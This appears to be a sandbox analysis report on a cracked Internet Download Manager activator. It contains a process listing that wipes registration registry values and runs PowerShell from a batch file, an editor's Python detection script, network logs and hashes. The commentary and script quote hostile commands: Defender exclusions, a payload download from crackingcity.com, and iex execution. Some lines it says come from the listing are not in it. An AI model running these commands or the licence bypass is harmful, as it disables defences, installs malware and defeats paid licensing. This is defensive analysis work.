"C:\Windows\System32\regsvr32.exe" /s "C:\Program Files (x86)\Internet Download Manager\IDMGetAll64.dll"

C:\Windows\system32\regsvr32.exe

/s "C:\Program Files (x86)\Internet Download Manager\IDMIECC64.dll"

C:\Windows\SysWOW64\regsvr32.exe

"C:\Windows\System32\regsvr32.exe" /s "C:\Program Files (x86)\Internet Download Manager\downlWithIDM64.dll"

C:\Windows\system32\regsvr32.exe

/s "C:\Program Files (x86)\Internet Download Manager\downlWithIDM64.dll"

C:\Windows\system32\regsvr32.exe

/s "C:\Program Files (x86)\Internet Download Manager\IDMGetAll64.dll"

C:\Program Files (x86)\Internet Download Manager\IDMan.exe

"C:\Program Files (x86)\Internet Download Manager\IDMan.exe" /n /d "https://www.internetdownloadmanager.com/register/IDMlib/images/idman_logos.png" /p "C:\Windows\Temp" /f temp.png

C:\Windows\System32\timeout.exe

timeout /t 1

C:\Program Files (x86)\Internet Download Manager\IDMan.exe

"C:\Program Files (x86)\Internet Download Manager\IDMan.exe" /n /d "https://www.internetdownloadmanager.com/pictures/idm_about.png" /p "C:\Windows\Temp" /f temp.png

C:\Windows\System32\timeout.exe

timeout /t 1

C:\Windows\System32\timeout.exe

timeout /t 3

C:\Windows\System32\tasklist.exe

tasklist /fi "imagename eq idman.exe"

C:\Windows\System32\findstr.exe

findstr /i "idman.exe"

C:\Windows\System32\taskkill.exe

taskkill /f /im idman.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe "$sid = 'S-1-5-21-3452737119-3959686427-228443150-1000'; $HKCUsync = 1; $lockKey = 1; $deleteKey = $null; $f=[io.file]::ReadAllText('C:\Users\Admin\AppData\Local\Temp\ytmp\IDM.bat') -split ':regscan\:.*';iex ($f[1])"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe write-host -back '"DarkGreen"' -fore '"white"' '"The IDM Activation process has been completed."'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe write-host -back '"Darkgray"' -fore '"white"' '"If the fake serial screen appears, use the Freeze Trial option instead."'

C:\Users\Admin\AppData\Local\Temp\ytmp\NSudo86x.exe

NSudo86x -U:C -P:E -UseCurrentConsole "C:\Program Files (x86)\Internet Download Manager\IDMan.exe" /onboot

C:\Program Files (x86)\Internet Download Manager\IDMan.exe

"C:\Program Files (x86)\Internet Download Manager\IDMan.exe" /onboot

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe write-host -back '"Black"' -fore '"Yellow"' '"Press any key to return..."'

C:\Program Files (x86)\Internet Download Manager\IEMonitor.exe

"C:\Program Files (x86)\Internet Download Manager\IEMonitor.exe"

C:\Windows\SysWOW64\regsvr32.exe

"C:\Windows\System32\regsvr32.exe" /s "C:\Program Files (x86)\Internet Download Manager\IDMShellExt64.dll"

C:\Windows\system32\regsvr32.exe

/s "C:\Program Files (x86)\Internet Download Manager\IDMShellExt64.dll"

C:\Windows\SysWOW64\regsvr32.exe

"C:\Windows\System32\regsvr32.exe" /s "C:\Program Files (x86)\Internet Download Manager\IDMIECC64.dll"

C:\Windows\system32\regsvr32.exe

/s "C:\Program Files (x86)\Internet Download Manager\IDMIECC64.dll"

C:\Windows\SysWOW64\regsvr32.exe

"C:\Windows\System32\regsvr32.exe" /s "C:\Program Files (x86)\Internet Download Manager\IDMGetAll64.dll"

C:\Windows\SysWOW64\regsvr32.exe

"C:\Windows\System32\regsvr32.exe" /s "C:\Program Files (x86)\Internet Download Manager\downlWithIDM64.dll"

C:\Windows\system32\regsvr32.exe

/s "C:\Program Files (x86)\Internet Download Manager\IDMGetAll64.dll"

C:\Windows\system32\regsvr32.exe

/s "C:\Program Files (x86)\Internet Download Manager\downlWithIDM64.dll"

C:\Windows\System32\mode.com

mode 75, 28

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe write-host -back '"Black"' -fore '"Gray"' '" "' -NoNewline; write-host -back '"Black"' -fore '"Green"' '"Enter a menu option in the Keyboard [1,2,3,4,5,6,7]"'

C:\Windows\System32\choice.exe

choice /C:1234567 /N

C:\Windows\System32\mode.com

mode 113, 35

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe "&{$W=$Host.UI.RawUI.WindowSize;$B=$Host.UI.RawUI.BufferSize;$W.Height=34;$B.Height=300;$Host.UI.RawUI.WindowSize=$W;$Host.UI.RawUI.BufferSize=$B;}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ping -n 1 internetdownloadmanager.com

C:\Windows\System32\PING.EXE

ping -n 1 internetdownloadmanager.com

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v ProductName 2>nul

C:\Windows\System32\reg.exe

reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v ProductName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg query "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Environment" /v PROCESSOR_ARCHITECTURE

C:\Windows\System32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Environment" /v PROCESSOR_ARCHITECTURE

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ver

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg query "HKU\S-1-5-21-3452737119-3959686427-228443150-1000\Software\DownloadManager" /v idmvers 2>nul

C:\Windows\System32\reg.exe

reg query "HKU\S-1-5-21-3452737119-3959686427-228443150-1000\Software\DownloadManager" /v idmvers

C:\Windows\System32\tasklist.exe

tasklist /fi "imagename eq idman.exe"

C:\Windows\System32\findstr.exe

findstr /i "idman.exe"

C:\Windows\System32\taskkill.exe

taskkill /f /im idman.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c powershell.exe "(Get-Date).ToString('yyyyMMdd-HHmmssfff')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe "(Get-Date).ToString('yyyyMMdd-HHmmssfff')"

C:\Windows\System32\reg.exe

reg export HKCU\Software\Classes\Wow6432Node\CLSID "C:\Windows\Temp\_Backup_HKCU_CLSID_20240414-023035952.reg"

C:\Windows\System32\reg.exe

reg query "HKCU\Software\DownloadManager" "/v" "FName"

C:\Windows\System32\reg.exe

reg delete "HKCU\Software\DownloadManager" "/v" "FName" /f

C:\Windows\System32\reg.exe

reg query "HKCU\Software\DownloadManager" "/v" "LName"

C:\Windows\System32\reg.exe

reg delete "HKCU\Software\DownloadManager" "/v" "LName" /f

C:\Windows\System32\reg.exe

reg query "HKCU\Software\DownloadManager" "/v" "Email"

C:\Windows\System32\reg.exe

reg delete "HKCU\Software\DownloadManager" "/v" "Email" /f

C:\Windows\System32\reg.exe

reg query "HKCU\Software\DownloadManager" "/v" "Serial"

C:\Windows\System32\reg.exe

reg delete "HKCU\Software\DownloadManager" "/v" "Serial" /f

C:\Windows\System32\reg.exe

reg query "HKCU\Software\DownloadManager" "/v" "scansk"

C:\Windows\System32\reg.exe

reg query "HKCU\Software\DownloadManager" "/v" "tvfrdt"

C:\Windows\System32\reg.exe

reg query "HKCU\Software\DownloadManager" "/v" "radxcnt"

C:\Windows\System32\reg.exe

reg delete "HKCU\Software\DownloadManager" "/v" "radxcnt" /f

C:\Windows\System32\reg.exe

reg query "HKCU\Software\DownloadManager" "/v" "LstCheck"

C:\Windows\System32\reg.exe

reg delete "HKCU\Software\DownloadManager" "/v" "LstCheck" /f

C:\Windows\System32\reg.exe

reg query "HKCU\Software\DownloadManager" "/v" "ptrk_scdt"

C:\Windows\System32\reg.exe

reg delete "HKCU\Software\DownloadManager" "/v" "ptrk_scdt" /f

C:\Windows\System32\reg.exe

reg query "HKCU\Software\DownloadManager" "/v" "LastCheckQU"

C:\Windows\System32\reg.exe

reg query "HKLM\SOFTWARE\Wow6432Node\Internet Download Manager"

C:\Windows\System32\reg.exe

reg delete "HKLM\SOFTWARE\Wow6432Node\Internet Download Manager" /f

C:\Windows\System32\reg.exe

reg add "HKLM\SOFTWARE\Wow6432Node\Internet Download Manager" /v "AdvIntDriverEnabled2" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe "$sid = 'S-1-5-21-3452737119-3959686427-228443150-1000'; $HKCUsync = 1; $lockKey = 1; $deleteKey = $null; $toggle = 1; $f=[io.file]::ReadAllText('C:\Users\Admin\AppData\Local\Temp\ytmp\IDM.bat') -split ':regscan\:.*';iex ($f[1])"

C:\Program Files (x86)\Internet Download Manager\IDMan.exe

"C:\Program Files (x86)\Internet Download Manager\IDMan.exe" /n /d "https://www.internetdownloadmanager.com/images/idm_box_min.png" /p "C:\Windows\Temp" /f temp.png

C:\Windows\System32\timeout.exe

timeout /t 1

C:\Program Files (x86)\Internet Download Manager\IDMIntegrator64.exe

"C:\Program Files (x86)\Internet Download Manager\IDMIntegrator64.exe" -runcm

C:\Program Files (x86)\Internet Download Manager\Uninstall.exe

"C:\Program Files (x86)\Internet Download Manager\Uninstall.exe" -instdriv

C:\Windows\System32\timeout.exe

timeout /t 1

C:\Windows\system32\RUNDLL32.EXE

"C:\Windows\Sysnative\RUNDLL32.EXE" SETUPAPI.DLL,InstallHinfSection DefaultInstall 128 C:\Program Files (x86)\Internet Download Manager\idmwfp.inf

C:\Windows\system32\runonce.exe

"C:\Windows\system32\runonce.exe" -r

C:\Windows\System32\grpconv.exe

"C:\Windows\System32\grpconv.exe" -o

C:\Windows\SysWOW64\net.exe

"C:\Windows\System32\net.exe" start IDMWFP

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 start IDMWFP

C:\Windows\SysWOW64\regsvr32.exe

"C:\Windows\System32\regsvr32.exe" /s "C:\Program Files (x86)\Internet Download Manager\IDMShellExt64.dll"

C:\Windows\system32\regsvr32.exe

/s "C:\Program Files (x86)\Internet Download Manager\IDMShellExt64.dll"

C:\Program Files (x86)\Internet Download Manager\IEMonitor.exe

"C:\Program Files (x86)\Internet Download Manager\IEMonitor.exe"

C:\Windows\SysWOW64\regsvr32.exe

"C:\Windows\System32\regsvr32.exe" /s "C:\Program Files (x86)\Internet Download Manager\IDMShellExt64.dll"

C:\Windows\SysWOW64\regsvr32.exe

"C:\Windows\System32\regsvr32.exe" /s "C:\Program Files (x86)\Internet Download Manager\IDMIECC64.dll"

C:\Windows\system32\regsvr32.exe

/s "C:\Program Files (x86)\Internet Download Manager\IDMShellExt64.dll"

C:\Windows\SysWOW64\regsvr32.exe

"C:\Windows\System32\regsvr32.exe" /s "C:\Program Files (x86)\Internet Download Manager\IDMGetAll64.dll"

C:\Windows\system32\regsvr32.exe

/s "C:\Program Files (x86)\Internet Download Manager\IDMIECC64.dll"

C:\Windows\system32\regsvr32.exe

/s "C:\Program Files (x86)\Internet Download Manager\IDMGetAll64.dll"

C:\Windows\SysWOW64\regsvr32.exe

"C:\Windows\System32\regsvr32.exe" /s "C:\Program Files (x86)\Internet Download Manager\downlWithIDM64.dll"

C:\Windows\system32\regsvr32.exe

/s "C:\Program Files (x86)\Internet Download Manager\downlWithIDM64.dll"

C:\Windows\System32\timeout.exe

timeout /t 1

C:\Program Files (x86)\Internet Download Manager\IDMan.exe

"C:\Program Files (x86)\Internet Download Manager\IDMan.exe" /n /d "https://www.internetdownloadmanager.com/register/IDMlib/images/idman_logos.png" /p "C:\Windows\Temp" /f temp.png

C:\Windows\System32\timeout.exe

timeout /t 1

C:\Program Files (x86)\Internet Download Manager\IDMan.exe

"C:\Program Files (x86)\Internet Download Manager\IDMan.exe" /n /d "https://www.internetdownloadmanager.com/pictures/idm_about.png" /p "C:\Windows\Temp" /f temp.png

C:\Windows\System32\timeout.exe

timeout /t 1

C:\Windows\System32\timeout.exe

timeout /t 3

C:\Windows\System32\tasklist.exe

tasklist /fi "imagename eq idman.exe"

C:\Windows\System32\findstr.exe

findstr /i "idman.exe"

C:\Windows\System32\taskkill.exe

taskkill /f /im idman.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe "$sid = 'S-1-5-21-3452737119-3959686427-228443150-1000'; $HKCUsync = 1; $lockKey = 1; $deleteKey = $null; $f=[io.file]::ReadAllText('C:\Users\Admin\AppData\Local\Temp\ytmp\IDM.bat') -split ':regscan\:.*';iex ($f[1])"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe write-host -back '"DarkGreen"' -fore '"white"' '"The IDM 30 days trial period is successfully freezed for Lifetime."'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe write-host -back '"Darkgray"' -fore '"white"' '"If IDM is showing a popup to register, reinstall IDM."'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe write-host -back '"Black"' -fore '"Yellow"' '"Press any key to return..."'

C:\Windows\System32\mode.com

mode 75, 28

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe write-host -back '"Black"' -fore '"Gray"' '" "' -NoNewline; write-host -back '"Black"' -fore '"Green"' '"Enter a menu option in the Keyboard [1,2,3,4,5,6,7]"'

C:\Windows\System32\choice.exe

choice /C:1234567 /N

C:\Windows\System32\mode.com

mode 113, 35

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe "&{$W=$Host.UI.RawUI.WindowSize;$B=$Host.UI.RawUI.BufferSize;$W.Height=34;$B.Height=300;$Host.UI.RawUI.WindowSize=$W;$Host.UI.RawUI.BufferSize=$B;}"

C:\Windows\System32\tasklist.exe

tasklist /fi "imagename eq idman.exe"

C:\Windows\System32\findstr.exe

findstr /i "idman.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c powershell.exe "(Get-Date).ToString('yyyyMMdd-HHmmssfff')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe "(Get-Date).ToString('yyyyMMdd-HHmmssfff')"

C:\Windows\System32\reg.exe

reg export HKCU\Software\Classes\Wow6432Node\CLSID "C:\Windows\Temp\_Backup_HKCU_CLSID_20240414-023051599.reg"

C:\Windows\System32\reg.exe

reg query "HKCU\Software\DownloadManager" "/v" "FName"

C:\Windows\System32\reg.exe

reg query "HKCU\Software\DownloadManager" "/v" "LName"

C:\Windows\System32\reg.exe

reg query "HKCU\Software\DownloadManager" "/v" "Email"

C:\Windows\System32\reg.exe

reg query "HKCU\Software\DownloadManager" "/v" "Serial"

C:\Windows\System32\reg.exe

reg query "HKCU\Software\DownloadManager" "/v" "scansk"

C:\Windows\System32\reg.exe

reg query "HKCU\Software\DownloadManager" "/v" "tvfrdt"

C:\Windows\System32\reg.exe

reg query "HKCU\Software\DownloadManager" "/v" "radxcnt"

C:\Windows\System32\reg.exe

reg delete "HKCU\Software\DownloadManager" "/v" "radxcnt" /f

C:\Windows\System32\reg.exe

reg query "HKCU\Software\DownloadManager" "/v" "LstCheck"

C:\Windows\System32\reg.exe

reg delete "HKCU\Software\DownloadManager" "/v" "LstCheck" /f

C:\Windows\System32\reg.exe

reg query "HKCU\Software\DownloadManager" "/v" "ptrk_scdt"

C:\Windows\System32\reg.exe

reg query "HKCU\Software\DownloadManager" "/v" "LastCheckQU"

C:\Windows\System32\reg.exe

reg query "HKLM\SOFTWARE\Wow6432Node\Internet Download Manager"

C:\Windows\System32\reg.exe

reg delete "HKLM\SOFTWARE\Wow6432Node\Internet Download Manager" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe "$sid = 'S-1-5-21-3452737119-3959686427-228443150-1000'; $HKCUsync = 1; $lockKey = $null; $deleteKey = 1; $f=[io.file]::ReadAllText('C:\Users\Admin\AppData\Local\Temp\ytmp\IDM.bat') -split ':regscan\:.*';iex ($f[1])"

C:\Windows\System32\reg.exe

reg add "HKLM\SOFTWARE\Wow6432Node\Internet Download Manager" /v "AdvIntDriverEnabled2" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe write-host -back '"DarkGreen"' -fore '"white"' '"The IDM reset process has been completed."'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe write-host -back '"Black"' -fore '"Yellow"' '"Press any key to return..."'

C:\Windows\System32\mode.com

mode 75, 28

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe write-host -back '"Black"' -fore '"Gray"' '" "' -NoNewline; write-host -back '"Black"' -fore '"Green"' '"Enter a menu option in the Keyboard [1,2,3,4,5,6,7]"'

C:\Windows\System32\choice.exe

choice /C:1234567 /N

C:\Windows\system32\wuapp.exe

"C:\Windows\system32\wuapp.exe" startmenu

C:\Windows\SysWOW64\DllHost.exe

C:\Windows\SysWOW64\DllHost.exe /Processid:{06622D85-6856-4460-8DE1-A81921B41C4B}
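The command lines above are the useful part of this report for a responder: the activator hides its working directory with attrib, unpacks password-protected 7-Zip payloads, adds Defender exclusions for that directory and for two dropped binaries, fetches dlIhost.7z from www.crackingcity.com, registers a scheduled task from an XML file, runs PowerShell that is sliced out of IDM.bat with -split and iex, and finally launches IDMan.exe through the NSudo privilege helper. The Python below is an added example written by the editor; it is not code from the sandbox, the report, or the activator. Part 1 runs a small rule set over (image, command line) records copied from the listing and separates the crackingcity.com download from the vendor's own downloads, with the vendor domain suffix taken as an assumption from the IDMan.exe /d URLs above. Part 2 reproduces the batch/PowerShell polyglot launcher statically, so the embedded PowerShell can be carved out of a dropped .bat for review instead of being executed; the IDM.bat stand-in is constructed because the dropped file's contents are not in the report.

```python
"""Added triage example (editor's code, not from the sandbox report or the
activator).  Part 1: rules over (image, command line) records as listed above.
Part 2: static carve of the batch/PowerShell polyglot launcher
    $f=[io.file]::ReadAllText('IDM.bat') -split '<label>'; iex ($f[1])
so the embedded PowerShell is extracted for review rather than executed."""
import re
from dataclasses import dataclass

# Records copied from the listing above (image path, command line); a subset.
SAMPLE_RECORDS = [
    (r"C:\Windows\SysWOW64\attrib.exe",
     r'ATTRIB +S +H "C:\Users\Admin\AppData\Roaming\DLL"'),
    (r"C:\Users\Admin\AppData\Local\Temp\ytmp\7za.exe",
     "7za e files.tmp -ptmp@tmp420 -aoa NSudo86x.exe"),
    (r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     r'''powershell.exe "$f=[io.file]::ReadAllText('C:\Users\Admin\AppData\Local\Temp\ytmp\IDM.bat') -split ':PowerShellTest:\s*';iex ($f[1])"'''),
    (r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     r'POWERSHELL -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\DLL" -Force'),
    (r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     r'POWERSHELL -Command Add-MpPreference -ExclusionProcess "dlIhost.exe" -Force'),
    (r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     r'''POWERSHELL -Command "Invoke-WebRequest 'https://www.crackingcity.com/VScan/dlIhost.7z' -OutFile 'C:\Users\Admin\AppData\Roaming\DLL\dlIhost.7z'"'''),
    (r"C:\Windows\SysWOW64\schtasks.exe",
     r'schtasks /create /xml ".\UpdateTask.xml" /tn "UpdateTask" /f'),
    (r"C:\Users\Admin\AppData\Local\Temp\ytmp\7za.exe",
     r'7za e "C:\Users\Admin\AppData\Roaming\DLL\dlIhost.7z" -o"C:\Users\Admin\AppData\Roaming\DLL" -pun#912345678@rar -aoa'),
    (r"C:\Users\Admin\AppData\Local\Temp\ytmp\NSudo86x.exe",
     r'NSudo86x -U:C -P:E -UseCurrentConsole "C:\Program Files (x86)\Internet Download Manager\IDMan.exe" /onboot'),
    (r"C:\Windows\System32\reg.exe",  # ordinary activity; must not fire
     r'reg query "HKCU\Software\DownloadManager" "/v" "Serial"'),
]

# (rule name, regex over the command line); captured groups become the detail.
RULES = [
    ("defender_exclusion", re.compile(r'add-mppreference\s+-(exclusion\w+)\s+"?([^"\s]+)', re.I)),
    ("payload_download", re.compile(
        r"(?:invoke-webrequest|downloadfile\(|downloadstring\()\s*'?(https?://([^/'\"\s]+)[^'\"\s]*)", re.I)),
    ("protected_archive_extract", re.compile(r'^7za\s+[ex]\s+(\S+).*\s-p(\S+)', re.I)),
    ("schtask_from_xml", re.compile(r'schtasks\s+/create\s+/xml\s+"?([^"\s]+)', re.I)),
    ("hidden_attrib", re.compile(r'^attrib\s.*\+h\s+"?([^"]+)', re.I)),
    ("bat_embedded_powershell", re.compile(
        r"readalltext\('([^']+\.bat)'\)\s*-split\s*'([^']+)'.*\biex\b", re.I)),
    ("privilege_helper", re.compile(r'^nsudo\S*\s.*?"([^"]+)"', re.I)),
]


@dataclass(frozen=True)
class Finding:
    rule: str
    detail: str
    cmdline: str


def triage(records):
    """One Finding per (record, rule) hit; reg/tasklist/timeout noise yields none."""
    findings = []
    for _image, cmdline in records:
        for name, rx in RULES:
            m = rx.search(cmdline)
            if m:
                findings.append(Finding(name, " | ".join(g for g in m.groups() if g), cmdline))
    return findings


def off_vendor_download_hosts(findings, vendor="internetdownloadmanager.com"):
    """Hosts reached by PowerShell downloads, minus the vendor's own domain.
    The vendor suffix is an assumption taken from the IDMan.exe /d URLs above."""
    hosts = set()
    for f in findings:
        if f.rule == "payload_download":
            host = f.detail.split(" | ")[1].lower()
            if host != vendor and not host.endswith("." + vendor):
                hosts.add(host)
    return sorted(hosts)


# Constructed stand-in for the dropped IDM.bat (its real contents are not in the
# report).  cmd.exe stops at `exit /b`; PowerShell slices the text by label.
SAMPLE_BAT = r"""@echo off
rem batch part; cmd.exe never runs past the next line
exit /b
:PowerShellTest:
$ExecutionContext.SessionState.LanguageMode
:PowerShellTest:
:regscan: anything after the label on this line is eaten by .* in the pattern
Write-Output "sid=$sid lockKey=$lockKey deleteKey=$deleteKey"
"""


def carve_embedded_powershell(bat_text, split_pattern):
    """Static equivalent of `ReadAllText(bat) -split pattern; iex ($f[1])`.
    -split takes a .NET regex and returns every piece; the launcher runs piece
    [1], the text after the first label up to the next one (or end of file).
    .NET and Python agree on the two patterns the listing uses, so re.split
    carves exactly what iex would run.  Variables assigned before the split in
    the launcher line ($sid, $lockKey, ...) are the carved code's parameters."""
    pieces = re.split(split_pattern, bat_text)
    if len(pieces) < 2:
        raise ValueError("label not found in batch text")
    return pieces[1]


if __name__ == "__main__":
    found = triage(SAMPLE_RECORDS)
    for f in found:
        print(f"{f.rule:26} {f.detail}")
    print("off-vendor download hosts:", off_vendor_download_hosts(found))
    print(carve_embedded_powershell(SAMPLE_BAT, r":PowerShellTest:\s*").strip())
```

Two caveats when carving a real file rather than the stand-in. First, check whether the split pattern also matches the launcher's own spelling of it: `:PowerShellTest:\s*` does match the text `:PowerShellTest:` inside a launcher line, in which case piece [1] is the launcher's tail rather than the payload, whereas `:regscan\:.*` cannot match its own source text because of the escaped colon. Second, the carved section is only half the story: the launcher at the `:regscan` call sites sets `$sid`, `$HKCUsync`, `$lockKey`, `$deleteKey` and `$toggle` before iex, and those flags (note `$lockKey = 1` on the activation and freeze passes, `$deleteKey = 1` on the reset pass) select what the section does to the registry.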

Network

Country Destination Domain Proto
US 8.8.8.8:53 www.crackingcity.com udp
US 172.67.187.136:443 www.crackingcity.com tcp
US 8.8.8.8:53 www.internetdownloadmanager.com udp
US 169.61.27.133:443 www.internetdownloadmanager.com tcp
US 169.61.27.133:443 www.internetdownloadmanager.com tcp
US 169.61.27.133:443 www.internetdownloadmanager.com tcp
US 169.61.27.133:443 www.internetdownloadmanager.com tcp
US 169.61.27.133:443 www.internetdownloadmanager.com tcp
US 169.61.27.133:443 www.internetdownloadmanager.com tcp
US 169.61.27.133:443 www.internetdownloadmanager.com tcp
US 169.61.27.133:443 www.internetdownloadmanager.com tcp
US 169.61.27.133:443 www.internetdownloadmanager.com tcp
US 8.8.8.8:53 mirror2.internetdownloadmanager.com udp
US 174.127.113.77:443 mirror2.internetdownloadmanager.com tcp
US 174.127.113.77:443 mirror2.internetdownloadmanager.com tcp
US 174.127.113.77:443 mirror2.internetdownloadmanager.com tcp
US 174.127.113.77:443 mirror2.internetdownloadmanager.com tcp
US 174.127.113.77:443 mirror2.internetdownloadmanager.com tcp
US 174.127.113.77:443 mirror2.internetdownloadmanager.com tcp
N/A 127.0.0.1:52402 tcp
US 8.8.8.8:53 contile.services.mozilla.com udp
US 8.8.8.8:53 shavar.services.mozilla.com udp
US 8.8.8.8:53 content-signature-2.cdn.mozilla.net udp
US 8.8.8.8:53 push.services.mozilla.com udp
US 8.8.8.8:53 firefox.settings.services.mozilla.com udp
US 169.61.27.133:443 www.internetdownloadmanager.com tcp
US 34.160.144.191:443 content-signature-2.cdn.mozilla.net tcp
US 34.117.237.239:443 contile.services.mozilla.com tcp
US 35.83.153.5:443 shavar.services.mozilla.com tcp
US 34.107.243.93:443 push.services.mozilla.com tcp
US 34.149.100.209:443 firefox.settings.services.mozilla.com tcp
US 8.8.8.8:53 contile.services.mozilla.com udp
US 8.8.8.8:53 www.internetdownloadmanager.com udp
US 8.8.8.8:53 prod.content-signature-chains.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 contile.services.mozilla.com udp
US 8.8.8.8:53 www.internetdownloadmanager.com udp
US 8.8.8.8:53 prod.content-signature-chains.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 autopush.prod.mozaws.net udp
US 8.8.8.8:53 shavar.prod.mozaws.net udp
US 8.8.8.8:53 prod.remote-settings.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 autopush.prod.mozaws.net udp
US 8.8.8.8:53 shavar.prod.mozaws.net udp
US 8.8.8.8:53 prod.remote-settings.prod.webservices.mozgcp.net udp
N/A 127.0.0.1:52414 tcp
US 8.8.8.8:53 addons.mozilla.org udp
ES 52.84.66.62:443 addons.mozilla.org tcp
US 8.8.8.8:53 addons.mozilla.org udp
US 8.8.8.8:53 addons.mozilla.org udp
US 34.149.100.209:443 prod.remote-settings.prod.webservices.mozgcp.net tcp
US 8.8.8.8:53 test.internetdownloadmanager.com udp
US 8.8.8.8:53 secure.internetdownloadmanager.com udp
US 8.8.8.8:53 mirror3.internetdownloadmanager.com udp
US 8.8.8.8:53 mirror5.internetdownloadmanager.com udp
US 8.8.8.8:53 registeridm.com udp
US 8.8.8.8:53 addons.mozilla.org udp
ES 52.84.66.62:443 addons.mozilla.org tcp
US 8.8.8.8:53 addons.mozilla.org udp
N/A 127.0.0.1:1001 tcp
N/A 127.0.0.1:1001 tcp
US 8.8.8.8:53 www.internetdownloadmanager.com udp
US 8.8.8.8:53 extensionworkshop.com udp
US 8.8.8.8:53 www.internetdownloadmanager.com udp
US 8.8.8.8:53 extensionworkshop.com udp
US 8.8.8.8:53 extensionworkshop.com udp
N/A 127.0.0.1:1001 tcp
N/A 127.0.0.1:1001 tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 8.8.8.8:53 www.microsoft.com udp
US 8.8.8.8:53 www.microsoft.com udp
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 8.8.8.8:53 internetdownloadmanager.com udp
US 172.67.187.136:443 www.crackingcity.com tcp
US 169.61.27.133:443 internetdownloadmanager.com tcp
US 169.61.27.133:443 internetdownloadmanager.com tcp
US 169.61.27.133:80 internetdownloadmanager.com tcp
NL 185.80.221.18:80 test.internetdownloadmanager.com tcp
US 169.61.27.133:443 internetdownloadmanager.com tcp
US 8.8.8.8:53 speedtest.internetdownloadmanager.com udp
US 8.8.8.8:53 speedtest.internetdownloadmanager.com udp
US 169.61.27.132:80 speedtest.internetdownloadmanager.com tcp
US 169.61.27.132:80 speedtest.internetdownloadmanager.com tcp
US 169.61.27.133:443 internetdownloadmanager.com tcp
US 169.61.27.133:443 internetdownloadmanager.com tcp
US 169.61.27.133:443 internetdownloadmanager.com tcp
US 169.61.27.133:443 internetdownloadmanager.com tcp
US 169.61.27.133:443 internetdownloadmanager.com tcp
US 169.61.27.133:443 internetdownloadmanager.com tcp
US 169.61.27.133:443 internetdownloadmanager.com tcp
US 169.61.27.133:443 internetdownloadmanager.com tcp
US 169.61.27.133:443 internetdownloadmanager.com tcp

Files

C:\Users\Admin\AppData\Local\Temp\7zO4FBF3E16\IDM 6.xx Activator or Resetter v3.3.exe

MD5 b2bb695b656dfb91e01967de3a8beee3
SHA1 30ebac4eb84aa036bed8f8931b6493348b87108a
SHA256 7822fa6c35cbd1cfb95c780970deef14d8b53c62ade3a4bcf63c494c3f2e5bbd
SHA512 4c052ae34c2063b2d2ec8a9a877eaa4c20906d979d94305430bb00a3e7991ec7349b7a3965a0479dd48a1763bdb66e449a5be4c8d9c59abcaa3f180fedf8d269

C:\Users\Admin\AppData\Local\Temp\ytmp\main.bat

MD5 3ed6946c40da68e805c93aa96c79b246
SHA1 8a26d82d1c00ad39154dcc912b06aa63d543f9d9
SHA256 1a59a3037d6da10a939c6a54bfbde37ec9c8727ff5b546f36f4ace1258462abb
SHA512 7c6575ff020c97fc5578d9bbeaa1c1007a75e68a57644d8ff9eb64fd8844305123dea44a6d6eb78339d188c35215f3f9bec9119b7dfa107378bcb23abc9844ea

C:\Users\Admin\AppData\Local\Temp\ytmp\7za.exe

MD5 e3c061fa0450056e30285fd44a74cd2a
SHA1 8c7659e6ee9fe5ead17cae2969d3148730be509b
SHA256 e0e2c7d0f740fe2a4e8658ce54dfb6eb3c47c37fe90a44a839e560c685f1f1fa
SHA512 fe7796b4c5aa07c40aa2511a987fed59366d3c27bf7343f126f06cb937bfe7a7d8bd6cd785a7e3dc9087b99973e8542b6da7be6eed4585bd3cee13164aed79b4

C:\Users\Admin\AppData\Local\Temp\ytmp\files.tmp

MD5 86efb592316773110c1b67b8569ea5d8
